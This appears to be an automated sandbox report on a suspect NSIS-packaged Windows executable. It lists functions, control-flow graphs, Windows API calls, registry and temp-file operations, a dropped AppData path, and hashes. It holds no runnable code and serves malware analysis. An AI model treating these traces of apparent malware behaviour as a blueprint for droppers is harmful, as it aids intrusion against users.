                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 822 405da3-405daf 823 405db0-405de4 GetTickCount GetTempFileNameW 822->823 824 405df3-405df5 823->824 825 405de6-405de8 823->825 826 405ded-405df0 824->826 825->823 827 405dea 825->827 827->826
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405DC1
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\450707124374000811.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF), ref: 00405DDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-2934804179
                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                              • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                              • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                              Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 828 10001759-10001795 call 10001b18 832 100018a6-100018a8 828->832 833 1000179b-1000179f 828->833 834 100017a1-100017a7 call 10002286 833->834 835 100017a8-100017b5 call 100022d0 833->835 834->835 840 100017e5-100017ec 835->840 841 100017b7-100017bc 835->841 844 1000180c-10001810 840->844 845 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 840->845 842 100017d7-100017da 841->842 843 100017be-100017bf 841->843 842->840 851 100017dc-100017dd call 10002b57 842->851 847 100017c1-100017c2 843->847 848 100017c7-100017c8 call 1000289c 843->848 849 10001812-1000184c call 100015b4 call 100024a4 844->849 850 1000184e-10001854 call 100024a4 844->850 869 10001855-10001859 845->869 853 100017c4-100017c5 847->853 854 100017cf-100017d5 call 10002640 847->854 860 100017cd 848->860 849->869 850->869 863 100017e2 851->863 853->840 853->848 868 100017e4 854->868 860->863 863->868 868->840 870 10001896-1000189d 869->870 871 1000185b-10001869 call 10002467 869->871 870->832 876 1000189f-100018a0 GlobalFree 870->876 878 10001881-10001888 871->878 879 1000186b-1000186e 871->879 876->832 878->870 881 1000188a-10001895 call 1000153d 878->881 879->878 880 10001870-10001878 879->880 880->878 882 1000187a-1000187b FreeLibrary 880->882 881->870 882->878
                                                              APIs
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                              • String ID:
                                                              • API String ID: 1791698881-3916222277
                                                              • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                              • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                              • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                              • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                              Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 885 4023de-40240f call 402c37 * 2 call 402cc7 892 402415-40241f 885->892 893 402abf-402ace 885->893 895 402421-40242e call 402c37 lstrlenW 892->895 896 402432-402435 892->896 895->896 899 402437-402448 call 402c15 896->899 900 402449-40244c 896->900 899->900 902 40245d-402471 RegSetValueExW 900->902 903 40244e-402458 call 4030fa 900->903 907 402473 902->907 908 402476-402557 RegCloseKey 902->908 903->902 907->908 908->893 910 402885-40288c 908->910 910->893
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000023,00000011,00000002), ref: 00402429
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402469
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402551
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp
                                                              • API String ID: 2655323295-3631540343
                                                              • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                              • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                              • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                              • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                              Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Close$Enum
                                                              • String ID:
                                                              • API String ID: 464197530-0
                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                              • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                              • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C0C
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 00401640
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                              • API String ID: 1892508949-4074717334
                                                              • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                              • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                              • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                              • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                              Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405289
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                              • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                              • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                              • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                              Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                              • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                              • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                              • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                              Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                              • CloseHandle.KERNEL32(?), ref: 0040589D
                                                              Strings
                                                              • Error launching installer, xrefs: 0040587A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                              • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                              • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                              • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                              Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                              • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                              • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                              • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                              Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalFree.KERNEL32(005CA2E0), ref: 00401BE1
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Call
                                                              • API String ID: 3394109436-1824292864
                                                              • Opcode ID: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                              • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                              • Opcode Fuzzy Hash: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                              • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                              Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                              • GetLastError.KERNEL32 ref: 10002A62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                              • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                              • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                              • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                              Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402551
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID:
                                                              • API String ID: 3356406503-0
                                                              • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                              • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                              • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                              • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                              Function 00405C5B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C0C
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
